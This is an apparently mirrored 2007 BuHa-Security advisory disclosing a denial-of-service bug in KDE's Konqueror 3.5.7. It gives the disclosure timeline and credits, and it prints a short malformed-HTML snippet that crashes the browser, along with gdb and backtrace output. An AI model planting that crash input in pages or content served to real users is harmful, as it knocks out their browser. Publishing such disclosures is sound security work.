Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17678
HistoryAug 03, 2007 - 12:00 a.m.

[BuHa-Security] DoS Vulnerability in Konqueror 3.5.7

2007-08-0300:00:00
vulners.com
24
JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

| BuHa Security-Advisory #16 | Aug 01st, 2007 |

| Vendor | KDE's Konqueror |
| URL | http://www.konqueror.org/ |
| Version | <= 3.5.7 |
| Risk | Low (Denial Of Service) |

o Description:

Konqueror is the file manager for the K Desktop Environment and an
Open Source web browser with HTML 4.01 compliance.

Visit http://www.konqueror.org/ for detailed information.

o Denial of Service:

Following HTML code forces Konqueror to crash:
> <textarea></button></textarea></br><bdo dir="">
> <pre><frameset>
> <a>

Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html

> (gdb) set args konqueror.html
> (gdb) r
> Starting program: /usr/bin/konqueror konqueror.html
> (no debugging symbols found)
> […]
> [Thread debugging using libthread_db enabled]
> [New Thread -1234381104 (LWP 5982)]
> (no debugging symbols found)
> […]
> Qt: gdb: -nograb added to command-line options.
> Use the -dograb option to enforce grabbing.
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> (no debugging symbols found)
> […]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1234381104 (LWP 5982)]
> 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.

I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
an assert and when commenting out the assert the backtrace ends in:

> #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
> #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
> obj=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624

This issue does not seem to be exploitable.

o Disclosure Timeline:

03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.

o Solution:

There is no solution yet. I assume the KDE developers will address this
bug in an upcoming KDE release.

o Credits:

Thomas Waldegger <[email protected]>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[email protected]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,
Rodnox, trappy and all members of BuHa.

Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt

[1] http://www.kde.org/info/security/

Don't you feel the power of CSS Layouts?
BuHa-Security Community: https://buha.info/board/

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFGsNwHkCo6/ctnOpYRA02bAJ0YjwxUB3PnYf2IKTyT0RkauZmd3QCgir16
WHuq7rPUBPx1/5nx+jJUPDg=
=R4ZU
-----END PGP SIGNATURE-----

JSON